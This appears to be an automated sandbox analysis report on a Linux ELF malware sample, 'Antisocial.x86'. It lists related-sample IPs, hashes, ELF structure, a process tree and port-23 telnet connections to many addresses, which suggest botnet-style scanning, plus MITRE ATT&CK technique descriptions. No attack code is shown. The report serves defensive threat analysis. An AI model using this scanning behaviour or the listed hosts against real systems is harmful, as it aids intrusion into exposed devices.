	arm	Get hash	malicious	Browse	107.220.87.241
	x86	Get hash	malicious	Browse	108.213.51.215
	arm7	Get hash	malicious	Browse	104.58.236.145
	z0x3n.arm7	Get hash	malicious	Browse	45.21.146.181
	z0x3n.x86	Get hash	malicious	Browse	70.131.55.48
EDV-TEAM-OBERLANDDE	apep.arm7	Get hash	malicious	Browse	45.128.94.112
	Hilix.arm7	Get hash	malicious	Browse	45.128.94.119
	Hilix.x86	Get hash	malicious	Browse	45.128.94.101
	93T511Z3h8	Get hash	malicious	Browse	45.128.94.119
	Hilix.x86	Get hash	malicious	Browse	45.128.94.113
	ET42wHpzr3	Get hash	malicious	Browse	45.128.94.113

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
fb4726d465c5f28b84cd6d14cedd13a7	1TnmkstVG8	Get hash	malicious	Browse	34.249.145.219
	10CV2biW2d	Get hash	malicious	Browse	34.249.145.219
	r7bQAtiN68	Get hash	malicious	Browse	34.249.145.219
	86wbpLsr78	Get hash	malicious	Browse	34.249.145.219
	zYEw8iWwGB	Get hash	malicious	Browse	34.249.145.219
	3QM8LROaOk	Get hash	malicious	Browse	34.249.145.219
	75OHlqPaRY	Get hash	malicious	Browse	34.249.145.219
	S0QgabIiDO	Get hash	malicious	Browse	34.249.145.219
	vCLbAS7aPb	Get hash	malicious	Browse	34.249.145.219
	yzui4gwsrF	Get hash	malicious	Browse	34.249.145.219
	072FZHiMhs	Get hash	malicious	Browse	34.249.145.219
	sjZlfrpuyc	Get hash	malicious	Browse	34.249.145.219
	khoE2I8yer	Get hash	malicious	Browse	34.249.145.219
	wvsEoQ0khP	Get hash	malicious	Browse	34.249.145.219
	32	Get hash	malicious	Browse	34.249.145.219
	a-r.m-5.Sakura	Get hash	malicious	Browse	34.249.145.219
	NDYfrLSNFW	Get hash	malicious	Browse	34.249.145.219
	m-i.p-s.Sakura	Get hash	malicious	Browse	34.249.145.219
	6Qn1b9fB2C	Get hash	malicious	Browse	34.249.145.219
	ZSbDircdwC	Get hash	malicious	Browse	34.249.145.219

Dropped Files

No context

Created / dropped Files

/var/cache/motd-news Download File
Process:	/usr/bin/cut
File Type:	ASCII text
Category:	dropped
Size (bytes):	191
Entropy (8bit):	4.515771857099866
Encrypted:	false
SSDEEP:	3:P2lnI+5MsqqzNLz+FRNScHUBfRau95++sZzR5woLB1Fh0VTGTl/X5kURn:OZ8uNLzDc0pR75+9Zz/woFmIT52URn
MD5:	DD514F892B5F93ED615D366E58AC58AF
SHA1:	BA75EDB3C2232CC260BC187F604DC8F25AA72C11
SHA-256:	F40D0DCE6E83DF74109FEF5E68E51CC255727783EEAE04C3E34677E23F7552CF
SHA-512:	9150BDE63F6C4850C5340D8877892B4D9BBF9EBDC98CDCF557A93FA304C1222CEE446418F5BE2ACCDBF38393778AFA5D4F3EDCB37A47BF57D3A4B2DEAD42A2D0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	* Super-optimized for small spaces - read how we shrank the memory. footprint of MicroK8s to make it the smallest full K8s around... https://ubuntu.com/blog/microk8s-memory-optimisation.

Static File Info

General
File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.4588282370976575
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	Antisocial.x86
File size:	58448
MD5:	abf15f119a5fa686f85e3a9ce8f57cdc
SHA1:	6531db808704d554554e9b696f965e94088fdd00
SHA256:	e41b1347da792c9718d4a65b26cdb2fdda54590f40a4fa1441c7954f09545df4
SHA512:	ac28930a117bdb0b4486003d4f14e440d0c60dddc879a2542e1a1d9f6518c302cfbb7e09b056399f960d84dd2d83d9a0ccc5f4c1ee96d528e53011662c109df5
SSDEEP:	1536:TjkZoZPif+ODr/5K9IMG/CtZZDKuihKuH0iM4/cndhaSML4o+++++++++++++++:KoZ4+ODr/4IdCLcuihKuH44/Yzi++++y
File Content Preview:	.ELF....................d...4...........4. ...(..............................................`...`.......)..........Q.td............................U..S.......w....h....s...[]...$.............U......=.b...t..5....$`.....$`......u........t....h.[..........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	58048
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0xbd96	0x0	0x6	AX	16
.fini	PROGBITS	0x8053e46	0xbe46	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x8053e60	0xbe60	0x1d20	0x0	0x2	A	32
.ctors	PROGBITS	0x8056000	0xe000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x8056008	0xe008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x8056020	0xe020	0x260	0x0	0x3	WA	32
.bss	NOBITS	0x8056280	0xe280	0x2680	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0xe280	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0xdb80	0xdb80	4.1302	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0xe000	0x8056000	0x8056000	0x280	0x2900	2.1765	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2021 13:37:53.718877077 CET	55159	23	192.168.2.23	207.138.67.99
Nov 1, 2021 13:37:53.718888998 CET	55159	23	192.168.2.23	104.200.27.99
Nov 1, 2021 13:37:53.718941927 CET	55159	23	192.168.2.23	106.144.95.79
Nov 1, 2021 13:37:53.718946934 CET	55159	23	192.168.2.23	13.43.47.121
Nov 1, 2021 13:37:53.718955040 CET	55159	23	192.168.2.23	186.142.254.75
Nov 1, 2021 13:37:53.718962908 CET	55159	23	192.168.2.23	213.236.71.188
Nov 1, 2021 13:37:53.718972921 CET	55159	23	192.168.2.23	8.148.56.89
Nov 1, 2021 13:37:53.718981028 CET	55159	23	192.168.2.23	72.93.117.95
Nov 1, 2021 13:37:53.718993902 CET	55159	23	192.168.2.23	5.233.78.16
Nov 1, 2021 13:37:53.719016075 CET	55159	23	192.168.2.23	60.1.139.98
Nov 1, 2021 13:37:53.719023943 CET	55159	23	192.168.2.23	179.238.37.69
Nov 1, 2021 13:37:53.719027042 CET	55159	23	192.168.2.23	187.87.85.142
Nov 1, 2021 13:37:53.719027042 CET	55159	23	192.168.2.23	77.227.68.197
Nov 1, 2021 13:37:53.719036102 CET	55159	23	192.168.2.23	193.34.188.111
Nov 1, 2021 13:37:53.719042063 CET	55159	23	192.168.2.23	71.100.14.39
Nov 1, 2021 13:37:53.719043970 CET	55159	23	192.168.2.23	179.45.121.66
Nov 1, 2021 13:37:53.719043970 CET	55159	23	192.168.2.23	78.9.69.18
Nov 1, 2021 13:37:53.719046116 CET	55159	23	192.168.2.23	198.79.175.136
Nov 1, 2021 13:37:53.719048977 CET	55159	23	192.168.2.23	193.33.227.100
Nov 1, 2021 13:37:53.719059944 CET	55159	23	192.168.2.23	149.221.89.8
Nov 1, 2021 13:37:53.719064951 CET	55159	23	192.168.2.23	110.100.209.193
Nov 1, 2021 13:37:53.719068050 CET	55159	23	192.168.2.23	111.214.67.74
Nov 1, 2021 13:37:53.719069958 CET	55159	23	192.168.2.23	183.105.172.6
Nov 1, 2021 13:37:53.719074011 CET	55159	23	192.168.2.23	130.154.247.74
Nov 1, 2021 13:37:53.719074965 CET	55159	23	192.168.2.23	158.45.163.93
Nov 1, 2021 13:37:53.719079971 CET	55159	23	192.168.2.23	144.244.129.159
Nov 1, 2021 13:37:53.719084024 CET	55159	23	192.168.2.23	20.183.123.69
Nov 1, 2021 13:37:53.719089031 CET	55159	23	192.168.2.23	95.101.26.229
Nov 1, 2021 13:37:53.719096899 CET	55159	23	192.168.2.23	128.58.218.126
Nov 1, 2021 13:37:53.719099045 CET	55159	23	192.168.2.23	24.166.102.162
Nov 1, 2021 13:37:53.719101906 CET	55159	23	192.168.2.23	128.133.50.236
Nov 1, 2021 13:37:53.719110966 CET	55159	23	192.168.2.23	193.39.143.6
Nov 1, 2021 13:37:53.719114065 CET	55159	23	192.168.2.23	216.253.116.194
Nov 1, 2021 13:37:53.719116926 CET	55159	23	192.168.2.23	165.35.148.240
Nov 1, 2021 13:37:53.719126940 CET	55159	23	192.168.2.23	37.20.117.184
Nov 1, 2021 13:37:53.719130993 CET	55159	23	192.168.2.23	203.102.36.35
Nov 1, 2021 13:37:53.719136953 CET	55159	23	192.168.2.23	175.16.17.102
Nov 1, 2021 13:37:53.719141960 CET	55159	23	192.168.2.23	172.66.82.25
Nov 1, 2021 13:37:53.719142914 CET	55159	23	192.168.2.23	204.167.144.120
Nov 1, 2021 13:37:53.719150066 CET	55159	23	192.168.2.23	182.169.159.238
Nov 1, 2021 13:37:53.719151974 CET	55159	23	192.168.2.23	34.44.223.227
Nov 1, 2021 13:37:53.719160080 CET	55159	23	192.168.2.23	32.19.229.238
Nov 1, 2021 13:37:53.719161987 CET	55159	23	192.168.2.23	24.207.100.219
Nov 1, 2021 13:37:53.719166994 CET	55159	23	192.168.2.23	188.124.16.237
Nov 1, 2021 13:37:53.719168901 CET	55159	23	192.168.2.23	191.118.116.75
Nov 1, 2021 13:37:53.719168901 CET	55159	23	192.168.2.23	35.161.21.254
Nov 1, 2021 13:37:53.719180107 CET	55159	23	192.168.2.23	77.187.188.148
Nov 1, 2021 13:37:53.719182014 CET	55159	23	192.168.2.23	98.232.194.151
Nov 1, 2021 13:37:53.719186068 CET	55159	23	192.168.2.23	101.116.7.164
Nov 1, 2021 13:37:53.719189882 CET	55159	23	192.168.2.23	17.227.225.153
Nov 1, 2021 13:37:53.719192982 CET	55159	23	192.168.2.23	111.51.72.233
Nov 1, 2021 13:37:53.719197989 CET	55159	23	192.168.2.23	219.62.222.94
Nov 1, 2021 13:37:53.719197989 CET	55159	23	192.168.2.23	13.189.155.65
Nov 1, 2021 13:37:53.719207048 CET	55159	23	192.168.2.23	179.88.86.98
Nov 1, 2021 13:37:53.719216108 CET	55159	23	192.168.2.23	91.168.47.229
Nov 1, 2021 13:37:53.719217062 CET	55159	23	192.168.2.23	61.127.222.157
Nov 1, 2021 13:37:53.719222069 CET	55159	23	192.168.2.23	52.94.49.81
Nov 1, 2021 13:37:53.719232082 CET	55159	23	192.168.2.23	8.110.28.12
Nov 1, 2021 13:37:53.719235897 CET	55159	23	192.168.2.23	129.178.2.89
Nov 1, 2021 13:37:53.719237089 CET	55159	23	192.168.2.23	208.25.1.188
Nov 1, 2021 13:37:53.719239950 CET	55159	23	192.168.2.23	163.215.245.22
Nov 1, 2021 13:37:53.719243050 CET	55159	23	192.168.2.23	177.178.166.59
Nov 1, 2021 13:37:53.719244003 CET	55159	23	192.168.2.23	49.107.238.232
Nov 1, 2021 13:37:53.719253063 CET	55159	23	192.168.2.23	75.118.242.190
Nov 1, 2021 13:37:53.719254971 CET	55159	23	192.168.2.23	66.52.83.18
Nov 1, 2021 13:37:53.719258070 CET	55159	23	192.168.2.23	120.76.131.63
Nov 1, 2021 13:37:53.719259977 CET	55159	23	192.168.2.23	8.175.193.255
Nov 1, 2021 13:37:53.719264984 CET	55159	23	192.168.2.23	144.28.177.132
Nov 1, 2021 13:37:53.719269991 CET	55159	23	192.168.2.23	5.141.97.115
Nov 1, 2021 13:37:53.719270945 CET	55159	23	192.168.2.23	77.12.72.73
Nov 1, 2021 13:37:53.719270945 CET	55159	23	192.168.2.23	12.211.188.210
Nov 1, 2021 13:37:53.719274998 CET	55159	23	192.168.2.23	45.172.74.61
Nov 1, 2021 13:37:53.719275951 CET	55159	23	192.168.2.23	81.92.141.50
Nov 1, 2021 13:37:53.719285011 CET	55159	23	192.168.2.23	47.70.138.220
Nov 1, 2021 13:37:53.719289064 CET	55159	23	192.168.2.23	179.230.169.109
Nov 1, 2021 13:37:53.719293118 CET	55159	23	192.168.2.23	36.161.178.84
Nov 1, 2021 13:37:53.719294071 CET	55159	23	192.168.2.23	103.133.114.218
Nov 1, 2021 13:37:53.719300985 CET	55159	23	192.168.2.23	98.229.128.0
Nov 1, 2021 13:37:53.719302893 CET	55159	23	192.168.2.23	5.54.123.167
Nov 1, 2021 13:37:53.719304085 CET	55159	23	192.168.2.23	206.4.29.255
Nov 1, 2021 13:37:53.719305992 CET	55159	23	192.168.2.23	168.118.172.59
Nov 1, 2021 13:37:53.719315052 CET	55159	23	192.168.2.23	41.115.193.221
Nov 1, 2021 13:37:53.719320059 CET	55159	23	192.168.2.23	133.39.179.216
Nov 1, 2021 13:37:53.719324112 CET	55159	23	192.168.2.23	100.11.84.213
Nov 1, 2021 13:37:53.719331026 CET	55159	23	192.168.2.23	173.104.169.40
Nov 1, 2021 13:37:53.719331980 CET	55159	23	192.168.2.23	107.208.191.245
Nov 1, 2021 13:37:53.719338894 CET	55159	23	192.168.2.23	89.18.71.210
Nov 1, 2021 13:37:53.719341993 CET	55159	23	192.168.2.23	182.23.239.43
Nov 1, 2021 13:37:53.719346046 CET	55159	23	192.168.2.23	197.152.209.214
Nov 1, 2021 13:37:53.719347000 CET	55159	23	192.168.2.23	161.232.16.110
Nov 1, 2021 13:37:53.719350100 CET	55159	23	192.168.2.23	206.86.116.222
Nov 1, 2021 13:37:53.719357967 CET	55159	23	192.168.2.23	91.49.194.103
Nov 1, 2021 13:37:53.719362974 CET	55159	23	192.168.2.23	174.178.146.158
Nov 1, 2021 13:37:53.719369888 CET	55159	23	192.168.2.23	43.100.51.193
Nov 1, 2021 13:37:53.719371080 CET	55159	23	192.168.2.23	143.54.14.160
Nov 1, 2021 13:37:53.719372988 CET	55159	23	192.168.2.23	89.29.59.71
Nov 1, 2021 13:37:53.719374895 CET	55159	23	192.168.2.23	68.194.30.191
Nov 1, 2021 13:37:53.719383001 CET	55159	23	192.168.2.23	173.7.169.108
Nov 1, 2021 13:37:53.719388008 CET	55159	23	192.168.2.23	196.42.127.150
Nov 1, 2021 13:37:53.719389915 CET	55159	23	192.168.2.23	136.196.22.174

HTTP Request Dependency Graph

127.0.0.1:52869

System Behavior

Analysis Process: Antisocial.x86 PID: 5225 Parent PID: 5102

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	/tmp/Antisocial.x86
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5226 Parent PID: 5225

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5237 Parent PID: 5226

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5238 Parent PID: 5226

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5239 Parent PID: 5238

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5250 Parent PID: 5239

General

Start time:	13:38:03
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5251 Parent PID: 5239

General

Start time:	13:38:03
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5252 Parent PID: 5239

General

Start time:	13:38:03
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5253 Parent PID: 5239

General

Start time:	13:38:03
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5240 Parent PID: 5238

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5242 Parent PID: 5238

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5244 Parent PID: 5238

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5246 Parent PID: 5238

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5227 Parent PID: 5225

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5228 Parent PID: 5225

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5229 Parent PID: 5228

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5241 Parent PID: 5229

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5243 Parent PID: 5229

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5245 Parent PID: 5229

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5247 Parent PID: 5229

General

Start time:	13:37:58
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5230 Parent PID: 5228

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5231 Parent PID: 5228

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5232 Parent PID: 5228

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: Antisocial.x86 PID: 5234 Parent PID: 5228

General

Start time:	13:37:53
Start date:	01/11/2021
Path:	/tmp/Antisocial.x86
Arguments:	n/a
File size:	58448 bytes
MD5 hash:	abf15f119a5fa686f85e3a9ce8f57cdc

Analysis Process: dash PID: 5268 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cat PID: 5268 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/cat
Arguments:	cat /tmp/tmp.zwbUWO1Xs3
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Analysis Process: dash PID: 5269 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: head PID: 5269 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/head
Arguments:	head -n 10
File size:	47480 bytes
MD5 hash:	fd96a67145172477dd57131396fc9608

Analysis Process: dash PID: 5270 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: tr PID: 5270 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/tr
Arguments:	tr -d \\000-\\011\\013\\014\\016-\\037
File size:	51544 bytes
MD5 hash:	fbd1402dd9f72d8ebfff00ce7c3a7bb5

Analysis Process: dash PID: 5271 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cut PID: 5271 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/cut
Arguments:	cut -c -80
File size:	47480 bytes
MD5 hash:	d8ed0ea8f22c0de0f8692d4d9f1759d3

Analysis Process: dash PID: 5272 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cat PID: 5272 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/cat
Arguments:	cat /tmp/tmp.zwbUWO1Xs3
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Analysis Process: dash PID: 5273 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: head PID: 5273 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/head
Arguments:	head -n 10
File size:	47480 bytes
MD5 hash:	fd96a67145172477dd57131396fc9608

Analysis Process: dash PID: 5274 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: tr PID: 5274 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/tr
Arguments:	tr -d \\000-\\011\\013\\014\\016-\\037
File size:	51544 bytes
MD5 hash:	fbd1402dd9f72d8ebfff00ce7c3a7bb5

Analysis Process: dash PID: 5275 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: cut PID: 5275 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/cut
Arguments:	cut -c -80
File size:	47480 bytes
MD5 hash:	d8ed0ea8f22c0de0f8692d4d9f1759d3

Analysis Process: dash PID: 5276 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: rm PID: 5276 Parent PID: 4332

General

Start time:	13:38:28
Start date:	01/11/2021
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.zwbUWO1Xs3 /tmp/tmp.7ybUxelKh4 /tmp/tmp.tWQiSu25Ld
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report Antisocial.x86

Overview

General Information

Detection

Signatures

Classification

General Information

Process Tree

Yara Overview

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: Antisocial.x86 PID: 5225 Parent PID: 5102

General

Analysis Process: Antisocial.x86 PID: 5226 Parent PID: 5225

General

Analysis Process: Antisocial.x86 PID: 5237 Parent PID: 5226

General

Analysis Process: Antisocial.x86 PID: 5238 Parent PID: 5226

General

Analysis Process: Antisocial.x86 PID: 5239 Parent PID: 5238

General

Analysis Process: Antisocial.x86 PID: 5250 Parent PID: 5239

General

Analysis Process: Antisocial.x86 PID: 5251 Parent PID: 5239

General

Analysis Process: Antisocial.x86 PID: 5252 Parent PID: 5239

General

Analysis Process: Antisocial.x86 PID: 5253 Parent PID: 5239

General

Analysis Process: Antisocial.x86 PID: 5240 Parent PID: 5238